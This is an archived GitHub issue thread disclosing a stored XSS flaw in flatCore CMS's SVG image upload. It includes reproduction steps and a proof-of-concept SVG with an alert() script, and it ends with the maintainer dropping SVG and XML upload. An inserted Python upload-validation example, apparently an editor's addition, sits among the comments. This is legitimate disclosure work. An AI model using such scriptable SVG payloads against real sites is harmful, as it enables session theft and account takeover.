This repository has been archived by the owner on Jan 5, 2023. It is now read-only.

Cross Site Scripting (XSS) #53

Closed
tranquac opened this issue Aug 13, 2021 · 6 comments

Comments

@tranquac

Describe the bug
Cross Site Scripting (XSS) via upload image function

To Reproduce
Steps to reproduce the behavior:

  1. Login to flatcore CMS
  2. Click on 'Upload file'
  3. Drop an svg file containing an XSS payload, example filename: xss.svg
  4. The XSS then fires at the URL: http://domain/content/images/payload1.svg

Screenshots
https://raw.githubusercontent.com/tranquac/POC/main/xss_flatcoreCMS.PNG

xss.svg

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS in flatCore CMS");
   </script>
</svg>
```

Desktop (please complete the following information):

  • OS: All
  • Browser: All
  • Version: Latest version

Additional context
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.

@tranquac
Author

@patkon
Can you help me check this issue?
Looking forward to hearing from you.
Thanks.

@patkon
Member

patkon commented Aug 16, 2021

I think the best solution will be to remove SVG support from the core. Maybe I will write an addon to enable secure SVG upload later.

@tranquac
Author

Yes. That is a good idea for this issue!

patkon added a commit that referenced this issue Aug 18, 2021
These file types must be sanitized before uploading.
#53
@nu11secur1ty

nu11secur1ty commented Aug 26, 2021

Hello friends, the problem is still there and still critical!

Proof XSS Stored:

Proof PHPSESSID:

No matter what account the user is using, this is a broken infrastructure, logic, and architecture!

Please fix this problem and be more focused and responsible!

BR @nu11secur1ty System Administrator - Infrastructure and Penetration testing Engineer.

@patkon
Member

patkon commented Aug 26, 2021

Thank you for reporting. I've just released Version 2.0.8. From this version on there is no more SVG and XML upload.
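A server-side upload check in the spirit of the 2.0.8 fix, added here as an illustration and not flatCore's own code: it rejects SVG and XML both by extension and by sniffing the first bytes of the content, so a file that merely carries an image extension is caught as well. The `ALLOWED_EXTENSIONS` allowlist, `validate_upload` and the sample inputs are constructed for this example.

```python
import re

# Allowlist of raster formats accepted by this hypothetical upload handler
# (constructed for this example; not flatCore's actual list).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "webp"}

# Leading magic bytes for each allowed format (webp check is the RIFF header only).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "webp": b"RIFF",
}

# Optional UTF-8 BOM, optional whitespace, then an XML prolog, SVG doctype or <svg> root.
_XML_OR_SVG = re.compile(rb"^(\xef\xbb\xbf)?\s*(<\?xml|<!doctype\s+svg|<svg)", re.IGNORECASE)


def looks_like_svg_or_xml(data: bytes) -> bool:
    """Content sniff: True if the bytes start like an XML or SVG document."""
    return _XML_OR_SVG.match(data[:512]) is not None


def validate_upload(filename: str, data: bytes):
    """Return None when the upload is acceptable, otherwise a rejection reason."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return f"extension '{ext}' not allowed"
    # Check the content before trusting the extension: a scriptable SVG renamed
    # to .png must not reach the /content/images/ directory.
    if looks_like_svg_or_xml(data):
        return "content is XML/SVG regardless of extension"
    if not data.startswith(MAGIC[ext]):
        return f"content does not match {ext} signature"
    return None


# Constructed sample inputs: a minimal SVG (no script needed for the check to fire)
# and a minimal PNG header.
SAMPLE_SVG = b'<?xml version="1.0"?>\n<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in [("xss.svg", SAMPLE_SVG), ("xss.png", SAMPLE_SVG), ("photo.png", SAMPLE_PNG)]:
        print(name, "->", validate_upload(name, blob) or "accepted")
```

Serving the upload directory with `X-Content-Type-Options: nosniff` and a content type derived from the verified format, not from the client's filename, closes the remaining gap on the delivery side.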

@nu11secur1ty

Ok, thank you. 😘🙂

@patkon patkon closed this as completed Jan 5, 2023